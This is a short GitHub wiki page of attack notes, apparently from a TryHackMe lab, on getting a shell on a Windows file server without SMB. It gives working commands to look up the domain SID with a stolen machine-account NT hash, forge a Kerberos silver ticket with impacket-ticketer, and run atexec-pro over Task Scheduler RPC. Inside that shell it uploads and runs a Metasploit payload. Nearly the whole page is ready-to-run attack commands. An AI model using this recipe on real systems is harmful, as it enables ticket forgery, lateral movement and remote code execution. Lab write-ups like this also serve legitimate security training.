Silver ticket wo SMB - oscpname/RELAY_scenarios GitHub Wiki

Tools: https://github.com/Ridter/atexec-pro.git

Steps:

  1. get the domain SID with impacket-lookupsid (authenticating with the machine-account NT hash)
  2. forge a silver ticket for the target's HOST/ SPN with impacket-ticketer
  3. run atexec-pro with that ticket for fileless access without port 445 (it drives the Task Scheduler over MS-TSCH/RPC instead of SMB) and get a shell

Setup:

  • we have the NT hash of the file server's machine account, in secretsdump format - PC-FILESRV01$:1120:aad3b435b51404eeaad3b435b51404ee:e66f5cf1a026516d1d2220130d8d13c4
proxychains impacket-lookupsid HOLO.LIVE/'PC-FILESRV01$'@10.201.126.30 -hashes :e66f5cf1a026516d1d2220130d8d13c4
# Get the domain SID from the lookupsid output: S-1-5-21-471847105-3603022926-1728018720

#prepare silver ticket (ticketer puts RID 500 / Administrator in the PAC by default, which is what gives local admin on the target; use -user-id / -groups to change it)
proxychains impacket-ticketer -nthash e66f5cf1a026516d1d2220130d8d13c4 -domain-sid S-1-5-21-471847105-3603022926-1728018720 -dc-ip 10.201.126.30 -domain holo.live -spn HOST/PC-FILESRV01.holo.live 'watamet'
export KRB5CCNAME=watamet.ccache

#use atexec-pro
proxychains python3 atexec-pro.py PC-FILESRV01.holo.live -k -no-pass -dc-ip 10.201.126.30

# Inside the shell:
#ATShell (@PC-FILESRV01.holo.live)> upload /root/THM/Holo/binaries/msf_win_x64.exe C:\Windows\Tasks\msf.exe
#ATShell (@PC-FILESRV01.holo.live)> C:\Windows\Tasks\msf.exe